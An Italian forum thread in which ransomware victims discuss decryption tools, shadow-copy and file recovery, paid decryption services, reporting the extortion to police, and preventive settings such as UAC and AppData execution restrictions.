[...] ma bisogna avere il file "key.dat" che sembra introvabile.
Li hai cercati in tutto il pc?
Prova con l'ottimo Everything, oppure con Locate32. Entrambi gratuiti, fanno un piccolo file di database dei file degli hard disk, e poi la ricerca è istantanea! Il primo aggiorna dinamicamente il database, il secondo mi pare di no.

Li hai cercati in tutto il pc?
Prova con l'ottimo Everything, oppure con Locate32. Entrambi gratuiti, fanno un piccolo file di database dei file degli hard disk, e poi la ricerca è istantanea! Il primo aggiorna dinamicamente il database, il secondo mi pare di no.

Grazie Pahadimas, farò anche questo tentativo...

Inizialmente qualcosa facevano, perchè pare che per criptare alla fine cancellavano il dato originale. Le ultime varianti invece no: anche eprchè se così non fosse stato, sul mio pc il virus avrebbe potuto fare poco, avendo su tutte le partizoni spazio prossimo allo zero. Altrimenti utilizzano una cifratura a blocchi (ne so poco). Io invece spero che proprio lo scarso spazio su disco non mi abbia causato perdite di dati con processi di criptazione non andati a buon fine (per cui anche il decrypt finirebbe col fallire) Sono molto preoccupato al riguardo.

Quello che a me non è chiaro è se il virus lo devo togliere o se finita la criptazione, come dicono alcuni, se ne va da sè. In particolare non ho ancora capito se il mio pc può infettare altri devices in rete. O se i cell android possono essere "portatori sani" dell'infezione. E, in caso contagiassi altri pc, la chiave di decriptazione sarebbe la stressa (nel qual caso significherebbe che è il mio cp a criptare i loro files), o ne verrebbe creata un'altra?

Altra cosa. se muovo o rinomino i files (non l'estensione .encrypted) poi la decriptatura non va più a buon fine?
O ancora: se uso una chiave riprodotta da Dr web, che però risultasse imperfetta, i file che non riesce a decodificare poi rimangono in una sorta di "limbo" e pertanto non più decriptabili anche quando dovessi entrare in possesso della giusta chiave? Nel qual caso conviene lavorare su una copia dei dati e vedere il risultato, visto che mi apre di aver capito che si può lavorare su una copia, e non serve nemmeno avviare il SO infettato (cosa che invece pare serva, per recuperare la chiave quando ci si rivolge ai criminali: lì se si usa l'antivirus si rischia di non venirne più a capo, da quanto ho letto). Potete confermare?

Peraltro con la chiave rifatta il rischio che qualche file non venga decriptato c'è, da quanto ho letto su bleeper....
Ciao ed in bocca al lupo.

Ti posso dire che copiando il file da un hd ad un altro e lanciando il decriptatore il file torna a posto.
Funziona anche facendo un ghost del HD, i dati criptati tornano a posto sul disco clonato.
tempo fa dopo un mese mi sono accorto da un cliente che alcuni files erano rimasti criptati in rete, abbiamo fatto girare il decriptatore sulla condivisione e sono tornati a posto.
Se il decripter non ha finito non ti ha disabilitato le copie shadows e hai buone possibilità, fai la copia in una hd esterno.

Mica stupidi quelli di dr. web, hanno fiutato l' affare e forse hanno alzato i prezzi perchè hanno troppe richieste, così alcuni desistono. P.S. E' molto limitante l' uso di doc e xlsx perchè oggi tutti usano docx e xlsx, faccio un file e lo faccio criptare?

Funziona anche facendo un ghost del HD, i dati criptati tornano a posto sul disco clonato.
Il ghost dovrebbe essere un file immagine del disco, come quello che fa Acronis True Image. È quindi possibile dare in pasto il file immagine al decriptatore e questo decripterà tutti i file criptati contenuti in esso?

Un collega in ufficio ha preso questo "cryptolocker", fortunatamente gli altri pc erano spenti perchè si lavora in cloud...

La situazione è di quella già lette, aperto un allegato email, le estensioni vengono cambiate in .vvv e tenta di disabilitare la copia shadow.
Da MSE mi rileva i file "del riscatto" come Ransom:HTML/Tescrypt.D, già provato i tool Coin Vault Decryptor, Tesla Decrypter e forse pure altro, senza successo.

A me almeno per ora interesserebbe pulire il pc, è possibile o bisogna andare di format? Perchè mi sembra che i file di riscatto vengano ricreati ad ogni avvio e il pc sembra abbastanza lento.
I file li ho parzialmente recuperati grazie alle versione precedenti (non le foto su D: però..), ormai non ci credo molto nel recuperare il resto.

Da quanto scrivi non è la variante Crypt0L0cker però (per la quale Dr web ha una soluzione, al netto di eventuali sub varianti eventualmente esistenti e magari non compatibili con il loro decoder).
Se ci tieni ai file, evita il format totale, magari un giorno qualche soluzione sarà uscita fuori.
Per la pulizia del pc, ancora non mii sono informato bene sul da farsi, visto che prima aspetto il tool di dr web e poi agirò sul pc. Per adesso lascio tutto com'è (son 7 gg che tiro avanti con una distro live di ubuntu ed il mio fido note 4, che mi ha dato un'immensa mano nel momento del dolore :D ).
Non so però se pulirò il pc e basta, o se formatterò e con l'occasione passerò a win 10 con clean install. non ho ancora deciso nemmeno se lascerò ibernato così com'è lssd di sistema che si è beccato il cryptolocker... Certo sarebbe un Samsung 840 pro... e mi roderebbe non poco lasciarlo a prender polvere...





trovato!! ma non risolvo...:mc:

in che senso? Non dice che virus è? Vabbè, se lo mandi però a dr web li aiuterà ad identificarlo lo stesso.



Grazie delle info. Proverò a contattarli inviandogli i files.


E preparati a spendere sulle 150 cucuzze, sempre che sia risolvibile, e sempre che non varino i prezzi in base alla variante.



Anche io nutro i miei dubbi su Shadow anche se il problema ce l'ho su XP SP3....ma quando sei disperato le tenti tutte e non trascuri nessuna possibilità ......

Ovvio, come detto sono l'ultima spiaggia per recuperare qualcosa quà e là. Peròò io ribadisco: nell'ipotesi più nera, terrei tutto fermo ibernato e comprerei nuovi hard disk. Prima o poi fosse anche fra 10 anni, qualcosa uscirà. Vero è che motli dati hanno un senso oggi e non fra qualche anno, ma almeno i ricordi quelli se li si recupera è sempre una cosa buona.



Nemmeno io purtroppo....ho trovato questo link (http://www.bleepingcomputer.com/virus-removal/teslacrypt-alphacrypt-ransomware-information) dove spiega le possibilità di decriptaggio delle varie versioni di Tesla Decoder e conferma quanto hai detto che è indispensabile intercettare il file key.dat al momento della criptazione..

quel forum è notevole. Lo sto pian piano leggendo, e c'è gente in gamba che ci scrive (anche se le mie domande son rimaste inevase anche lì).


Speriamo bene... comunque ho deciso di sporgere denuncia..a tutti gli effetti si tratta di estorsione. Non si sa mai se li beccano... quanto meno sarà fatta giustizia!!

Fai bene. Vai di polizia postale.
io mi chiedevo se si può far riferimento a loro per chi dovesse per forza pagare il riscatto, ad es per evitare di farsi rubare dati personali (e l'identità), per evitare di beccarsi altri virus, e magari perchè se ti assistono nel pagamento, hanno molte più posibilità (anche se sempre assai poche) di poter raccogliere dati preziosi per identificarli, per costruire database con profili di gruppi criminali etc....



Ti posso dire che copiando il file da un hd ad un altro e lanciando il decriptatore il file torna a posto.
Funziona anche facendo un ghost del HD, i dati criptati tornano a posto sul disco clonato.
tempo fa dopo un mese mi sono accorto da un cliente che alcuni files erano rimasti criptati in rete, abbiamo fatto girare il decriptatore sulla condivisione e sono tornati a posto.


Bene, mi fa piacere sentirlo.
Ma se cambio il nome ad un file pure non ci sono problemi?
In base a quanto mi dici, mi par di capire che se ho una partizione con spazio vuoto a zero alla fine posso spostare un po' di files altrove, liberare spazio e poi procedere alla decriptazione sia dei file spostati che di quelli rimasti, senza problemi? Perchè dovrò fare qualcosa di simile se deciderò di agire sugli originali (sulle copie farei i test per vedere il risultato prima).



Se il decripter non ha finito non ti ha disabilitato le copie shadows e hai buone possibilità, fai la copia in una hd esterno.

Esatto, con i ransomware più recenti solo motivazioni contingenti possono lasciare intatte le copie shadow.


Mica stupidi quelli di dr. web, hanno fiutato l' affare e forse hanno alzato i prezzi perchè hanno troppe richieste, così alcuni desistono. P.S. E' molto limitante l' uso di doc e xlsx perchè oggi tutti usano docx e xlsx, faccio un file e lo faccio criptare?

Togli il forse: come dicevo su sono perlomeno 150€.
Vera pure la questione del .doc: per trovarne da inviargli senza farmi troppe pippe mentali per via del contenuto sensibile ho faticato non poco, visto che è un bel po' che creo solo docx etc...


Il ghost dovrebbe essere un file immagine del disco, come quello che fa Acronis True Image. È quindi possibile dare in pasto il file immagine al decriptatore e questo decripterà tutti i file criptati contenuti in esso?

Lasciamo eprdere Acronis: mi ha fatto perdere quasi 2 gg di tempo per fare la clonazione settore per settore anche dello spazio non allocato (o dei file cancellati). Lentissimo, e mi ha dato motli errori. Oggi dopo quasi un giorno che andava per clonare una aprtizione di 600 gb al 90% del suo ripristino si è bloccato e mi ha lasciato solo spazio non allocato.... Alla fine fatta la partizione di sistema, il resto me lo sono copiato a mano. Perchè era diventato una specie di gioco del 15, tutto ad incastri per fare prima le immagini e poi per scompattarle (perchè non credo che il decriptatore poi lavori anche dentro i file immagine). Non ho capito manco se il tool che lo attiva gira in win o dos....

Lasciamo eprdere Acronis: mi ha fatto perdere quasi 2 gg di tempo per fare la clonazione settore per settore anche dello spazio non allocato (o dei file cancellati). Lentissimo, e mi ha dato motli errori. Oggi dopo quasi un giorno che andava per clonare una aprtizione di 600 gb al 90% del suo ripristino si è bloccato e mi ha lasciato solo spazio non allocato.... Alla fine fatta la partizione di sistema, il resto me lo sono copiato a mano. Perchè era diventato una specie di gioco del 15, tutto ad incastri per fare prima le immagini e poi per scompattarle (perchè non credo che il decriptatore poi lavori anche dentro i file immagine). Non ho capito manco se il tool che lo attiva gira in win o dos....
Io invece non posso parlar male di Acronis True Image, che, almeno fino a qualche anno fa, mi pare fosse considerato il migliore. Di degni sostituti non ne conosco, tranne Norton Ghost, ma solo per sentito dire. E poi ci sarebbe la funzionalità Backup e ripristino integrata negli ultimi sistemi operativi, per lo meno in Windows 7, funzionalità che però viene sostituita da Acronis se questo è installato. Cioè in questo caso lanciando Backup e ripristino si avvia Acronis, motivo per cui non ho potuto mai provare la funzionalità integrata. Non ho approfondito se poteva comunque essere attivata lo stesso, per evitare di incasinare Acronis.

Fate capire un momento:

il sistema che devo sistemare aveva più di un HD interno e uno esterno, TUTTI colpiti dal virus che ha risparmiato solo C perchè è protetto dal meccanismo di scrittura diretta senza autorizzazione.

Ho messo tuti i dati criptati nel disco esterno che adesso contiene solo file criptati.

Siccome il pc deve essere rimesso in funzione, per avere qualche possibilità di salvezza pensavo di creare un'immagine acronis di C che è dove probabilmente si trovano virus e i file che possono essere utili per decriptare e poi procedere al format di tutti i dischi tranne quello esterno su cui ho salvato immagine e tutti i file decriptati, così un domani, in caso di cura, avrei potuto rimettere il sistema così come era e procedere.

State dicendo che con questo procedimento potrei perdere informazioni preziose utilizzabili eventualmente per recuperare qualcosa?

il sistema che devo sistemare aveva più di un HD interno e uno esterno, TUTTI colpiti dal virus che ha risparmiato solo C perchè è protetto dal meccanismo di scrittura diretta senza autorizzazione.
Cos'è questo meccanismo e come si attiva? Se è qualcosa che protegge i file, perché non lo hai attivato su tutte le partizioni?

State dicendo che con questo procedimento potrei perdere informazioni preziose utilizzabili eventualmente per recuperare qualcosa?
Cosa, di quello che si è detto, te lo fa pensare?

Cos'è questo meccanismo e come si attiva? Se è qualcosa che protegge i file, perché non lo hai attivato su tutte le partizioni?


Cosa, di quello che si è detto, te lo fa pensare?

Il sistema è usato da una famiglia (non la mia per fortuna!) e ognuno dei componenti ha un account personale con il proprio desktop.

Io penso che quando è stata presa l'infezione c'era un solo account loggato (quello che ha aperto l'allegato di posta o il lfile che conteneva il virus) e l'infezione ha colpito tutto ciò che non era protetto, quindi tutti i file comuni che erano quelli dei dischi secondari (esterno + l'altro interno) dove ogni utente può scrivere come vuole da quello che ho potuto vedere perchè non sono stati usati i meccanismi per fare propri file e directory. le cartelle protette da UAC e quelle degli altri account possono essere state salvate dalla protezione interna di windows stesso.

Siccome i dischi secondari contenevano centinaia di GB di dati di vario tipo, il virus ha avuto abbastanza tempo per fare danni e non credo che per puro caso siano stati risparmiati quelli di un desktop di un altro account.



Sto leggendo di chi pensa di cambiare HD per non toccare niente in quelli colpiti e dei problemi di acronis con il salvataggio settore per settore.

le cartelle protette da UAC e quelle degli altri account possono essere state salvate dalla protezione interna di windows stesso.
Ah, ti riferivi ai permessi NTFS di scrittura sulle cartelle utente. Se non sbaglio durante la creazione dell'account permette di scegliere se proteggere le cartelle utente dalla scrittura degli altri utenti oppure no. In ogni caso, mi stupisco che il malware non riesca a modificare i permessi di scrittura. Magari alcuni ci riescono e altri no.

UAC protegge solo determinate cartelle?
Se si vuole installare un programma in un percorso invece diverso da quello predefinito (quindi diverso da C:\Programmi), si può aggiungere la protezione UAC anche su quelle cartelle?

Sto leggendo di chi pensa di cambiare HD per non toccare niente in quelli colpiti e dei problemi di acronis con il salvataggio settore per settore.
Se l'immagine del disco non contiene i file cancellati, ci si preclude la possibilità di recuperare eventualmente qualcosa appunto dai file cancellati solo dalla tabella di allocazione file ma non fisicamente dal disco. L'opzione per includere anche i file cancellati dovrebbe essere l'opzione "Backup settore per settore" o la sotto-opzione "Backup dello spazio non allocato", però non capisco bene la differenza tra le due.

Dalla guida di Acronis True Image:

Modalità di creazione dell'immagine
È possibile usare questi parametri per creare una copia esatta di intere partizioni e dischi, non solo dei settori che contengono i dati. Notare che la casella di controllo Backup dello spazio non allocato è disponibile solo quando viene selezionata la casella di controllo Backup settore per settore.

Per eseguire un backup settore per settore, selezionare il parametro Backup settore per settore. Per impostazione predefinita, il programma copia soltanto i settori del disco rigido che contengono i dati. Tuttavia, a volte potrebbe essere utile creare un backup completo settore per settore. Ad esempio, nel caso siano stati eliminati per sbaglio dei file e si voglia creare un'immagine del disco prima di provare a recuperarli, perché a volte il ripristino può creare problemi nel file system. Notare che questa modalità aumenta il tempo di elaborazione e di solito produce un file di immagine più grande, perché copia settori utilizzati e non utilizzati del disco rigido.
La funzione Backup dello spazio non allocato diventa disponibile se è stato selezionato il parametro precedente, Esegui backup settore per settore. Per impostazione predefinita, durante l'esecuzione del backup settore per settore lo spazio non allocato non viene incluso nel file del backup. L'attivazione di quest'opzione includerà tutto lo spazio non allocato del disco nel backup.


Lo spazio non allocato dovrebbe essere quello su cui non c'è nessuna partizione. Ma se si sta eseguendo il backup non di tutto il disco ma della sola partizione, di quale spazio non allocato si tratterebbe? :confused:

Sono diversi modi di stabilire i permessi.. quello di UAC è uno ed è quello che mette in guardia so cosa si sta aprendo (grave errore in generale quello che consente all'utente di renderlo meno "Invasivo" o disattivarlo del tutto, ma è una funzionalità introdotta dopo le critiche a Vista), ma ci sono anche quelli di possesso delle cartelle e dei file, oltre ai vari permessi.

Devo dire che dall'interfaccia grafica si fa un po' fatica ad impostare i vari permessi perchè è un po' dispersiva. Sarebbe molto più pratico un comando da terminale (dovrebbe esistere) tipo quelli di linux che permettono velocemente di impostare proprietario, possesso e permessi sui file, tutti concetti che andrebbero assolutamente imparati da parte degli utenti comuni se si vuol sopravvivere a sti costanti attacchi.

UAC di default protegge la partizione C ad eccezione delle directory personali dell'utente quali desktop, documenti, immagini, musica e quelle nascoste come .appData dove guarda un po' si insinuano i malware.
Non so se si può estendere la protezione a tutte le partizioni.

Un terzo modo di proteggersi è quello di usare account che non sono amministratori così vengono inibite alcune funzioni di modifica del sistema anche se viene dato il permesso di esecuzione.


Quindi in teoria acronis dovrebbe essere in grado, con la settore per settore e spazio libero, di salvare tutto, anche a basso livello dove forse possono lavorare gli esperti che cercano la cura?

in che senso? Non dice che virus è? Vabbè, se lo mandi però a dr web li aiuterà ad identificarlo lo stesso.

Si, dice il nome del virus ma comunque per tentare decodifica con Tesla Decoder serve intercettare il file key.dat durante le operazioni di criptaggio. Ma mi domando: se conosco le cautele da adottare in caso di infezione ovvero se sò che mi serve il file Key.dat mentre il virus cripta, a quel punto dovrei già sapere (in anticipo) come comportarmi, ad esempio della necessità di procurarsi detto file, modalità di utilizzo di Tesla, ecc.. qui però faccio semplicemente prima ad evitare di essere contagiato :D
Purtroppo non possiamo conoscere le conseguenze ed i rimedi di tutti i virus e come agiscono. Ti colgono di sorpresa!! Quindi sei comunque impreparato e non tempestivo a salvare nel momento giusto, come nel nostro caso, il file indispensabile per la decodifica.

E preparati a spendere sulle 150 cucuzze, sempre che sia risolvibile, e sempre che non varino i prezzi in base alla variante.
Per caso hai avuto da dr.web preventivi o sono solo voci di corridoio?


quel forum è notevole. Lo sto pian piano leggendo, e c'è gente in gamba che ci scrive (anche se le mie domande son rimaste inevase anche lì).
E' da tenere sotto controllo per eventuali aggiornamenti.

Fai bene. Vai di polizia postale.
io mi chiedevo se si può far riferimento a loro per chi dovesse per forza pagare il riscatto, ad es per evitare di farsi rubare dati personali (e l'identità), per evitare di beccarsi altri virus, e magari perchè se ti assistono nel pagamento, hanno molte più posibilità (anche se sempre assai poche) di poter raccogliere dati preziosi per identificarli, per costruire database con profili di gruppi criminali etc....
Purtroppo non conosco le procedure forensi per tali casi. Il magistrato, dovrebbe intervenire d'ufficio visto che si tratta di denuncia. Al limite si può chiedere di la punizione del/dei colpevoli, essere informati in caso di decreto penale di condanna o in caso di archiviazione. In ogni caso è sempre meglio procedere a fare denuncia collettiva (per chi è stato contagiato) e non singola per avere più possibilità di evitare l'archiviazione. Ho letto che in Italia ne hanno beccati già sette!

Per caso hai avuto da dr.web preventivi o sono solo voci di corridoio?


Ho aperto un ticket. Mi hanno detto che il loro Rescue pack costa 150€. Poi non so se per altre varianti il costo varia. Solo che non è chiaro se poi in Italia devi aggiungere l'iva o meno (ovvero 180€).

Ho aperto un ticket. Mi hanno detto che il loro Rescue pack costa 150€. Poi non so se per altre varianti il costo varia. Solo che non è chiaro se poi in Italia devi aggiungere l'iva o meno (ovvero 180€).
Caspita!!! Questa è un'attività redditizia!!!Alla fine il costo dovrebbe essere simile a quello dei ricattatori ma con la differenza di rivestire carattere di ufficialità.....poi se, come dici tu, a seconda della variante il costo aumenterà allora bisogna valutare che valore si dà ai propri dati.
Riguardo l'IVA non dovrebbe essere pagata all'estero ma non so se bisogna versare la tassa di sdoganamento.

ciao ragazzi, io non ho preso questo virus infame.
però riassumendo, dopo quasi un anno di thread, per prevenire Criptolocker
io ho fatto cosi, ditemi se c'è di meglio

ESET NOD32 a pagamento (questo lo usavo anche prima)
ADBlock su Firefox (non so se serva a qualcosa per i virus)
Cryptoprevent-Foolish(versione gratuita che aggiorno manualmente)
Sandboxie
Windows 7 con UAC al massimo
Principali programmi (PDF-Java-Flash-Windows update)sempre aggiornati
altro?

Salve a tutti. Purtroppo anch'io oggi sono stata colpita da questo maledetto virus, che mi ha criptato tute le foto con estensione .vvv (stranamente i video invece sono rimasi illesi, così come altri tipi di files, sembra aver colpito solo le immagini).
Fortunatamente non ho bisogno di recuperare nulla perchè il poco che avevo e che mi interessava era un backup della sd dello smartphone sulla quale ho conservato ancora i dati.
C'è solo una cosa che volevo chiedere e che leggendo un po' tra le varie risposte non ho ancora capito : ora che i files sono stati criptati ho bisongo di formattare il pc perchè il virus rimane in circolo oppure mi basta eliminare tali files e i files di testo e html che il virus ha creato in ogni cartella? Foto illeggibili a parte Il pc in sè funziona benissimo, nel senso i programmi girano tranquillamente così come la navigazione in internet e tutto il resto...

grazie

ciao ragazzi, io non ho preso questo virus infame.
però riassumendo, dopo quasi un anno di thread, per prevenire Criptolocker
io ho fatto cosi, ditemi se c'è di meglio

ESET NOD32 a pagamento (questo lo usavo anche prima)
ADBlock su Firefox (non so se serva a qualcosa per i virus)
Cryptoprevent-Foolish(versione gratuita che aggiorno manualmente)
Sandboxie
Windows 7 con UAC al massimo
Principali programmi (PDF-Java-Flash-Windows update)sempre aggiornati
altro?
Ho trovato questa piccola guida che spiega come inserire restrizioni all'avvio automatico di software mediante regole aggiuntive. regole che impediscono l'esecuzione di file eseguibili nella cartella AppData dove, sembra, non dovrebbero esserci mai programmi.
http://www.navigaweb.net/2014/12/bloccare-installazione-e-esecuzione-di.html
Su quest'altro sito http://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#decrypt, sono riportate ulteriori stringhe da inserire ma attenzione agli spazi e alla compatibilità con il sistema operativo. Unico dubbio non so se nella stringa bisogna editare "Local Settings" o " Impostazioni Locali" come riportato nella versione italiana di windows.
In alternativa esiste un piccolo software che si chiama CryptoPrevent che effettua queste operazioni in automatico.

Salve a tutti. Purtroppo anch'io oggi sono stata colpita da questo maledetto virus, che mi ha criptato tute le foto con estensione .vvv (stranamente i video invece sono rimasi illesi, così come altri tipi di files, sembra aver colpito solo le immagini).
Fortunatamente non ho bisogno di recuperare nulla perchè il poco che avevo e che mi interessava era un backup della sd dello smartphone sulla quale ho conservato ancora i dati.
C'è solo una cosa che volevo chiedere e che leggendo un po' tra le varie risposte non ho ancora capito : ora che i files sono stati criptati ho bisongo di formattare il pc perchè il virus rimane in circolo oppure mi basta eliminare tali files e i files di testo e html che il virus ha creato in ogni cartella? Foto illeggibili a parte Il pc in sè funziona benissimo, nel senso i programmi girano tranquillamente così come la navigazione in internet e tutto il resto...

grazie


ValeX81, dopo molte ricerche su internet ho capito che per eliminare il virus su un PC già infettato non è sufficiente un Antimalware ma bisogna editare anche alcune stringhe del registro per rimuoverne ogni traccia. Troverai anche siti anche in italiano che spiegano come fare. Ma fai attenzione e salva sempre, prima di apportare modifiche, il registro originario!!!

ciao ragazzi, io non ho preso questo virus infame.
però riassumendo, dopo quasi un anno di thread, per prevenire Criptolocker
io ho fatto cosi, ditemi se c'è di meglio

ESET NOD32 a pagamento (questo lo usavo anche prima)
ADBlock su Firefox (non so se serva a qualcosa per i virus)
Cryptoprevent-Foolish(versione gratuita che aggiorno manualmente)
Sandboxie
Windows 7 con UAC al massimo
Principali programmi (PDF-Java-Flash-Windows update)sempre aggiornati
altro?
magari impostare dns restrittivi può essere un'ulteriore "sicurezza"

Salve a tutti. Purtroppo anch'io oggi sono stata colpita da questo maledetto virus, che mi ha criptato tute le foto con estensione .vvv (stranamente i video invece sono rimasi illesi, così come altri tipi di files, sembra aver colpito solo le immagini).
Fortunatamente non ho bisogno di recuperare nulla perchè il poco che avevo e che mi interessava era un backup della sd dello smartphone sulla quale ho conservato ancora i dati.
C'è solo una cosa che volevo chiedere e che leggendo un po' tra le varie risposte non ho ancora capito : ora che i files sono stati criptati ho bisongo di formattare il pc perchè il virus rimane in circolo oppure mi basta eliminare tali files e i files di testo e html che il virus ha creato in ogni cartella? Foto illeggibili a parte Il pc in sè funziona benissimo, nel senso i programmi girano tranquillamente così come la navigazione in internet e tutto il resto...

grazie

Una ripulita va data comunque, anche se questo è un virus piuttosto anomalo rispetto allo standard. Segui qualche guida online, per ripulire bene il sistema dalle tracce di questo bastardo.

ma .vvv che variante è?

Una domanda: domani devo affrontare per la prima volta un pc infetto da un virus simile. Se attaccassi l'hard disk infettato come disco secondario in un altro pc e avviassi l'os di questo secondo pc rischio di infettare anche questo pc?

Piccolo aggiornamento:
poco più in alti c'è un link che porta sul sito navigaweb e che riporta i comandi per applicare delle policies restrittive sul percorso AppData; con quelle linee di comando non mi funziona nè su win8.1 nè su windows 7 mentre le linee corrette sono (nel mio caso):
C:\Users\[tuo nome utente]\AppData\*exe
e idem per LocalAppData.
Dopo aver dato una ripulita al pc in oggetto (mancavano servizi ed ho dovuto ripristinare il firewall) stiamo provando a recuperare vecchie versioni dei file criptati con un software di recupero file cancellati: se il malware opera cancellando gli originali e creando copie criptate spero così di poter bypassare la cosa. Vi fARò SAPERE.
L'infezione sembrerebbe da ceyptowall 3.0 ma devo esaminare meglio i files per essere sicuro.

Proprio stamattina nell'account di posta secondario mi sono ritrovato questa bella email, naturalmente col link al cryptolocker da clikkare

http://s28.postimg.org/53h6ikdot/Immagine1.png

e non era nemmeno nell'indesiderata, ma a quanto pare finiscono direttamente nella posta buona.

nessuno tiene d'occhio il sito della Tgsoft autori di Virit? Ci sono alcuni articoli molto interessanti da parte dell'ing. G. Tonello che ormai sono più di vent'anni che si occupa di sicurezza informatica, in particolare sulle varanti della bestiaccia oggetto del tread

http://www.tgsoft.it/italy/news_archivio.asp?id=671

11/12/2015 14:45:43 -
Nuova variante Trojan.Win32.CryptoFF.C che cripta i file di documenti e ne richiede un riscatto

http://www.tgsoft.it/italy/news_archivio.asp?id=670

10/12/2015 10:42:35 - Falsa e-mail di EQUITALIA scatena nuove varianti di CTB-Locker che crittografano i file di dati del PC / SERVER e richiedono il riscatto

interessante la spiegazione della modalità di azione del loro software contro i ctb locker

Questo Virit potrebbe essere un buon sistema di difesa contro questo malware.
Ma anche la visualizzazione delle estensioni, normalmente disattivata di default, andrebbe attivata sempre.

Per quello che ho visto però questi ransomware hanno lo stesso modello di attacco degli altri malware: che sia via mail o via web o via file si installono sempre dal percorso appdata o localdata quindi, quindi, fino a quando non cambieranno, è un buon sistema impedire l'esecuzione di eseguibili o simili da quei percorsi (bitdefender ha fatto un programmino specifico simile a crypto prevent ma va bene anche mettere delle policies come indicato qualche post addietro).
Piuttosto non ho ancora capito: se ho una partizione dove di solito piazzo i backup diversa da quella dell'os ed elimino l'assegnazione della lettera per unità, il malware in questione è capace di criptare i file nella partizone lo stesso?
Per la cronaca sul pc che sto trattando abbiamo recuperato un pò di file (non molti purtroppo) tramite recuva e mi chiedevo se avendo copia sia dei file criptati che dei corrispondenti non criptati si potesse ricavare la chiave di decodifica e procedere allo sblocco di tutto.

Proprio stamattina nell'account di posta secondario mi sono ritrovato questa bella email, naturalmente col link al cryptolocker da clikkare

http://s28.postimg.org/53h6ikdot/Immagine1.png

e non era nemmeno nell'indesiderata, ma a quanto pare finiscono direttamente nella posta buona.

Perché è una nuova buttata

Ciao, se ti riferisci alla procedura passando per il sito italiano la trovi scritta abbastanza chiaramente qui:

http://www.decryptolocker.it/

Se invece vuoi inviare direttamente a dr web in russia non saprei.

Non so se c'è differenza di costi: il sito italiano chiede 70€ (ma credo solo se ti decriptano i file, per inviarti la "cura"). Il sito russo non ho idea.

Ciao Alpha Centauri, chiedo scusa a te e a tutti gli interessati se non mi son più fatto vivo ma, abbiamo problemi di salute in famiglia...

Dunque i ns.problemi dovrebbero essere risolti scaricando l'antivirus sul sito russo: http://antifraud.drweb.com/encryption_trojs/?lng=en
che, visitandolo più volte abbassa il prezzo, adesso è di €.15 poi,
si contatta il dr.Web che, dovrebbe risolvere il problema senza costi aggiuntivi.
Il mio problema è che, non sapendo l'inglese, devo mettermi a tradurre con " im traslator " componente aggiuntivo di Firefox e,per adesso non nè ho il tempo. Se c'è tra di noi un buon samaritano che lo faccia e lo pubblichi, chissà in quanti sarebbero felici....

Mi aggiungo alla lista degli infetti.

Il PC di mia moglie (Win10) è stato infettato dalla variante CTB-Locker, per la quale non ci sono soluzioni al momento (ho scritto e mandato due files a decryptolocker.it che in circa mezz'ora mi ha risposto di non poter fare nulla al momento, ma che saremo ricontattati nel caso trovassero la chiave).

Purtroppo l'ultimo backup che avevo risale al 2013, e dovrò lavorare da quello per recuperare qualcosa.

La richiesta di riscatto era di 2 bitcoin (circa 850,00 euro), che non ho intenzione di pagare, nonostante sia ormai assodato che posso dire addio ai files (il virus ha cancellato le shadow copies, e tool come Recuva e EasyUS recovery non riescono a darmi copie utilizzabili dei dati, tranne qualche raro pdf, sembra proprio che il virus sovrascriva i files che cripta).

Ho quindi rimosso (credo e chiedo conferma) il virus con Malwarebytes (era stato cmq bloccato da Defender), e salvato le directory con i files criptati in un HDD esterno.

Il PC ora è scollegato dalla rete (il NAS è stato risparmiato in quanto non mappato), e, a parte i dati criptati, mi sembra "disinfettato".

Secondo voi posso evitare di formattarlo?

Per quella che è la mia esperienza (molto piccola) ti direi di si: il virus è piuttosto banale da ripulire e quindi ti direi che dovrebbe bstare ciò che hai fatto (sostanzialmente basta ripulire appdata e localdata dall'eseguibile e eliminare se non erro le tre chiavi di registro che genera).
Tuttavia se non c'è niente sopra da dover essere salvato e non trasportabile io formatterei per sicurezza e verificherei con qualche tool anti rootkit di essere defintivamente al sicuro.

Grazie skadex ;)

Qualche suggerimento sui tool da usare?

Ho qualche riserva sul formattare perchè il PC è arrivato con Win8.1 poi upgradato a Win10, temo che eseguendo il ripristino Lenovo mi riporti a 8.1 e non riesca più a fare l'upgrade al 10.

Onestamente no, predico bene ma razzolo male... ma credo che googolando un pò qualche anti rootkit efficiente sia facile da reperire.
Per windows 10: se hai effettuato l'aggiornamento non ci sono problemi dato che microsoft registra l'id macchina e quindi puoi addirittura reinstallare 10 direttamente. Addirittura con la nuova build dovresti poter inserire il seriale di 8.1 volendo (anche se non dovrebbe essere necessarion enl tuo caso).
E comunque puoi eseguire il ripristino di win10 direttamente con la pulizia di tutti i file, il ripristino di windows 8.1 dovrebbe avere una voce separata.

Ciao
Allora un mio amico si è beccato questo e criptato tutti i file...compreso quelli di backup del disco usb esterno che però aveva dimenticato attaccato....Il bastardo ha naturalmente eliminato i punti di ripristino ma ho sentito che si può recuperare le shadow copy per poter ripristinare. Quello che non so se devo usare un software di recupero dati è: dove risiedono fisicamente e come ripristinale.
Mi sapreste date un aiuto?
Grazie Massimo

Puoi usare il programma shadow explorer oppure semplicemente cliccando sul file proprietà versione precedente: se la copia shadow esiste verrà mostrata sennò niente da fare.
Nel mio caso niente da fare e qualcosa abbiamo recuperato solo tramite software di recupero dati cancellati (io ho utilizzato recuva ma puoi provare quello che più ti aggrada).
Se è una variante vecchia potresti pure aver successo con i programmi di decriptazione che mette a disposizione kaspersky (non ricordo il nome ma basta gogolare ed esce) tuttavia forse conviene prima utilizzare il software di recupero dato che ad ogni operazione potresti sovrascrivere eventuali file ancora recuperabili.

Come dicevo le shadow copies sono state cancellate quindi shadow Explorer nen ne trova. Che non ho capito è come recuperarle, cioè dove sono fisicamente e come funziona poi il ripristino se le trovo.
P.S. Stellar Phoenix può andare?
Massimo

Dove siano fisicamente non me ne sono informato, il concetto è che se non vengono trovate nè da shadowexplorer nè dal menù versioni precedenti non hai speranza di trovarle: il malware ha cancellato le copie e lo fa bene purtroppo.
Per stellar phoenix penso di si, non l'ho mai utilizzato ma è quel tipo di software che serve tenendo conto che le ultime varianti dopo aver cancellato i files si diverte a fare cicli di scrittura anche per impedire questa cosa ma tentare non nuoce, qualcosina sono riuscito a recuperare (sopratutto foto, i documenti invece niente).

Trovato niente...risparmiate solo qualche cartella e i video.
Adesso per carità il mio amico sarà sicuramente stato poco attento ma questi bastardi gli hanno fatto un danno enorme tra tutti i dati della sua ditta e tutte le foto della sua vita. Ho salvato il tutto in un disco esterno nella speranza che qualcuno trovi il modo di decriptare...:(
Massimo

